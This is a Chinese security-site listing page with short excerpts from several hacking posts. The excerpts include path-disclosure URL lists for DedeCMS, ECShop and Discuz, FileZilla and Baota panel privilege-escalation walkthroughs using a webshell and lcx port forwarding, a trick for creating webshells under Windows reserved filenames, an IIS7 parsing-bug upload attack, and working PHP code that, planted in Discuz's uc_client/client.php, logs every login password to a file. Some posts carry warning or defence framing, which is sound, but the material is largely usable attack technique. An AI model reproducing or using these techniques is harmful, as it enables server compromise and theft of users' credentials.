分类: [漏洞预警]

各种网站CMS找网站真实绝对路径收集整理

/member/templets/menulit.php /plus/paycenter/alipay/return_url.php /plus/paycenter/cbpayment/autoreceive.php /paycenter/nps/config_pay_nps.php /plus/task/dede-maketimehtml.php /plus/task/dede-optimize-table.php /plus/task/dede-upcache.php /wp-admin/includes/file.php /wp-content/themes/baiaogu-seo/footer.php /api/cron.php /wap/goods.php /temp/compiled/ur_here.lbi.php /temp/compiled/pages.lbi.php /temp/compiled/user_transaction.dwt.php /temp/compiled/history.lbi.php /temp/compiled/page ......

FileZilla Server windows2003 提权及防御

首先我们通过 webshell 找到 FileZilla 的文件目录,找到 FileZilla Server Interface.xml 文件,打开。我们可以看到它的连接地址:127.0.0.1 及端口:14147,密码这里为空。 在得到以上基本信息后,我们找到可读写文件,上传 lcx.exe 端口转发程序。因为从以上信息我们可以知道,它只侦听在本地的14147端口上。 然后执行端口转发命令: lcx.exe -tran 14148 127.0.0.1 14147 接着我们在我们本地机器上,通过 FileZilla 的服务端程序,来连接它!地址填写,目标地址端口为转发 ......

FileZilla Server windows2008 x64 提权与防御方法

目标站点环境: Windows Server 2008 R2 x64 PHP Version 5.4.31 MySQL Server 5.5 开启安全模式禁用一些函数:disable_functions,exec,system,passthru,popen,pclose,shell_exec,proc_open,dl,chmod,escapeshellarg,escapeshellcmd,sh2_exec,proc_terminate,proc_close:   C盘根目录无读,D盘全盘浏览。mysql降权单独用户,sqlserver端口修改为1434,数据库sa密码不正确,也无法利用。 站点支持aspx,上传大马看下,补丁打的比较多,vmware虚拟机, 安装了 206 个修补程序。EXP本地溢出无果:   &n ......

删除lpt1.css.asp或com8.index.asp这类文件的方法_asp木马无法删除解决办法

一般遇到lpt1.css.asp或com8.index.asp这类文件,都是黑客利用系统保留文件名创建的一些webshell。在Windows下不能以如下字样来命名文件或文件夹: aux|prn|con|nul|com1|com2|com3|com4|com5|com6|com7|com8|com9|lpt1|lpt2|lpt3|lpt4|lpt5|lpt6|lpt7|lpt8|lpt9 但是可以通过cmd的copy命令实现: D:\wwwroot>copy rootkit.asp \\.\D:\wwwroot\lpt6.80sec.asp    前面必须有 \\.\  已复制         1 个文件。  D:\wwwroot>dir 2010-04-25 14:4 ......

宝塔windows面板提权获取系统管理员权限方法!(非漏洞BUG)

使用过宝塔管理面板的朋友都知道,宝塔面板的文件管理是可以访问各个硬盘目录有,并能修改删除上传,这对整个服务器安全来说是相当危险的。该方法的前提是你获取了宝塔的后台管理权限否则就不用往下看了,下面来说说宝塔windows面板提权过程。 测试系统:windows 2008 宝塔windows面板版本:3.1 提权方式:启动项 如果有了解过渗透方面的都应该知道,windows服务器启动项目录C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup能上传 写入vbs bat脚本几乎都能拿到服务器的 ......

windows服务器IIS7解析漏洞修复解决方案_iis7.5 漏洞补丁

一、漏洞介绍 漏洞影响 IIS7 及IIS7.5 在使FastCGI方式调用php时,在php.ini里设置cgi.fix_pathinfo=1 使得访问任意文件URL时,在URL后面添加“/x.php”等字符时,该文件被iis当php文件代码解析。 如http://127.0.0.1/1.dif的内容如下: <?php phpinfo(); ?> 复制代码当访问http://127.0.0.1/1.dif/1.php 可以看到1.gif里的php代码被iis解析执行了。 那么“黑客”在具体攻击网站的时候,先可以通过网站提供的图片上传功能(也可以是其他的手段)上传一个包含了恶意PHP代码的图片文件。然后通过上面描叙方法,让iis解析执行 ......

ecshop商城cms暴网站路径漏洞

    /api/cron.php     /wap/goods.php     /temp/compiled/ur_here.lbi.php     /temp/compiled/pages.lbi.php     /temp/compiled/user_transaction.dwt.php     /temp/compiled/history.lbi.php     /temp/compiled/page_footer.lbi.php     /temp/compiled/goods.dwt.php     /temp/compiled/user_clips.dwt.php     /temp/compiled/goods_article.lbi.php     /temp/compiled/comments_list.lbi.php   ......

Discuz 3.0API爆路径漏洞

API爆路径漏洞API爆路径漏洞

api.php?mod[]=Seay
api/addons/zendcheck.php
api/addons/zendcheck52.php
api/addons/zendcheck53.php
source/plugin/mobile/api/1/index.php
source/plugin/mobile/extends/module/dz_digest.php
source/plugin/mobile/extends/module/dz_newpic.php
source/plugin/mobile/extends/module/dz_newreply.php
source/plugin/mobile/extends/module/dz_newthread.php
uc_server/control/admin/db.php

暗网出现史上最大数据库,14亿份明文凭证暴露,个人与企业都可能遭殃

FreeBuf 的读者对于暗网这个词应该不陌生了。暗网中汇聚了形形色色的商品和交易者,不论是毒品、武器,还是虚假文档和恶意软件,都能轻而易举地找到。由于其便利性和匿名化的特点,也催生了很多黑客服务,失窃的信息、泄露的数据库、入侵工具、入侵服务,在暗网不一而足。尽管这两年暗网最大的市场 Hansa 和 AlphaBay 都被关停,交易放缓,但从未停止。 日前,暗网监控公司 4iQ 发现暗网中出现了 高达 41 GB 的数据文件,其中包含 14 亿份以明文形式存储的账号邮箱和密码等登录凭证。研究人员认为,这是迄今为止“在暗网中 ......

dx论坛后台记录管理员密码 各位站长要好好检查

修改uc_client目录下的client.php 在 function uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = ”, $answer = ”) { 下加入如上代码  $ip=$_SERVER['REMOTE_ADDR']; $showtime=date("Y-m-d H:i:s"); $record="<br/>".$username." --------".$password." IP:".$ip." Time:".$showtime."\r\n"; $handle=fopen('./uc_client/hack.php','a+'); $write=fwrite($handle,$record); 只要论坛有人登录就会在 uc_client/hack.php 里面记录密码的。 和键盘记录效果是一样的 而且 ......